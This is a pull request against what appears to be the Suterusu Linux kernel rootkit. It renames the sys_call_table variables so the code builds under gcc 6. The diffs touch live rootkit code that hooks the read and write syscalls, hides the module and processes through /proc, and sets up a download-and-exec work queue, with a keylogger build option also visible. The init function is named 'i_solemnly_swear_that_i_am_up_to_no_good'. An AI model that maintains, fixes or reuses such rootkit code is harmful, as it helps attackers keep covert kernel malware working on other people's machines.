### PR TITLE
Fix conflicting types for ia32_sys_call_table and sys_call_table error

### DIFF
--- a/common.h
+++ b/common.h
@@ -41,7 +41,7 @@
 # define DEBUG_RW(fmt, ...)
 #endif
 
-extern unsigned long *sys_call_table;
+extern unsigned long *my_sys_call_table;
 
 char *strnstr(const char *haystack, const char *needle, size_t n);
 void *memmem(const void *haystack, size_t haystack_size, const void *needle, size_t needle_size);
@@ -60,7 +60,7 @@ void disable_module_loading(void);
 void enable_module_loading(void);
 
 #if defined(_CONFIG_X86_64_)
-extern unsigned long *ia32_sys_call_table;
+extern unsigned long *my_ia32_sys_call_table;
 #endif
 
 #if defined(_CONFIG_KEYLOGGER_)

--- a/dlexec.c
+++ b/dlexec.c
@@ -268,7 +268,7 @@ void dlexec_init ( void )
 {
     DEBUG("Initializing download & exec work queue\n");
 
-    sys_chmod = (void *)sys_call_table[__NR_chmod];
+    sys_chmod = (void *)my_sys_call_table[__NR_chmod];
     work_queue = create_workqueue("dlexec");
 }
 

--- a/hookrw.c
+++ b/hookrw.c
@@ -104,10 +104,10 @@ void hookrw_init ( void )
 {
     DEBUG("Hooking sys_read and sys_write\n");
 
-    sys_read = (void *)sys_call_table[__NR_read];
+    sys_read = (void *)my_sys_call_table[__NR_read];
     hijack_start(sys_read, &n_sys_read);
 
-    sys_write = (void *)sys_call_table[__NR_write];
+    sys_write = (void *)my_sys_call_table[__NR_write];
     hijack_start(sys_write, &n_sys_write);
 }
 

--- a/main.c
+++ b/main.c
@@ -48,8 +48,8 @@ static int (*root_iterate)(struct file *file, struct dir_context *);
 }
 #endif
 
-unsigned long *sys_call_table;
-unsigned long *ia32_sys_call_table;
+unsigned long *my_sys_call_table;
+unsigned long *my_ia32_sys_call_table;
 
 unsigned int hide_promisc = 0;
 unsigned int module_loading_disabled = 0;
@@ -993,13 +993,13 @@ static int __init i_solemnly_swear_that_i_am_up_to_no_good ( void )
     kobject_del(__this_module.holders_dir->parent);
 
     #if defined(_CONFIG_X86_64_)
-    ia32_sys_call_table = find_ia32_sys_call_table();
-    DEBUG("ia32_sys_call_table obtained at %p\n", ia32_sys_call_table);
+    my_ia32_sys_call_table = find_ia32_sys_call_table();
+    DEBUG("ia32_sys_call_table obtained at %p\n", my_ia32_sys_call_table);
     #endif
 
-    sys_call_table = find_sys_call_table();
+    my_sys_call_table = find_sys_call_table();
 
-    DEBUG("sys_call_table obtained at %p\n", sys_call_table);
+    DEBUG("sys_call_table obtained at %p\n", my_sys_call_table);
 
     /* Hook /proc for hiding processes */
     proc_iterate = get_vfs_iterate("/proc");


### PR DESCRIPTION
If the host uses gcc 6 compiler, the compiler shows error as follows.
>/home/user/suterusu/common.h:44:23: error: conflicting types for ‘sys_call_table’
> extern unsigned long *sys_call_table;
>                       ^~~~~~~~~~~~~~
>In file included from /usr/src/linux-headers-4.9.0-3-common/arch/x86/include/asm/elf.h:12:0,
>                 from /usr/src/linux-headers-4.9.0-3-common/include/linux/elf.h:4,
>                 from /usr/src/linux-headers-4.9.0-3-common/include/linux/module.h:15,
>                 from /home/user/suterusu/common.h:1,
>                 from /home/user/suterusu/main.c:1:
>/usr/src/linux-headers-4.9.0-3-common/arch/x86/include/asm/syscall.h:26:29: note: previous declaration of ‘sys_call_table’ was here
> extern const sys_call_ptr_t sys_call_table[];
>                             ^~~~~~~~~~~~~~

To fix this error, I change names of the variables.
Signed-off-by: Seunghun Han <kkamagui@gmail.com>